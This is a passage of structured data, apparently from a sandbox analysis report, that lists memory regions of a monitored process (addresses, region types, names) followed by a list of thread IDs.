start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 3094
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 3095
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 3096
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 3097
start_va = 0x7fffffdc000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 3098
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 3099
start_va = 0x1e0000
end_va = 0x1ebfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Thread:
id = 107
os_tid = 0x754
Thread:
id = 108
os_tid = 0x6b4
Thread:
id = 109
os_tid = 0x308
Thread:
id = 110
os_tid = 0x290
Thread:
id = 111
os_tid = 0x28c
Thread:
id = 112
os_tid = 0x288
Thread:
id = 113
os_tid = 0x264
Thread:
id = 114
os_tid = 0x260
Thread:
id = 115
os_tid = 0x25c
Thread:
id = 116
os_tid = 0x258
Thread:
id = 117
os_tid = 0x254
Thread:
id = 118
os_tid = 0x248
Thread:
id = 119
os_tid = 0x240
Thread:
id = 120
os_tid = 0x23c
Thread:
id = 121
os_tid = 0x238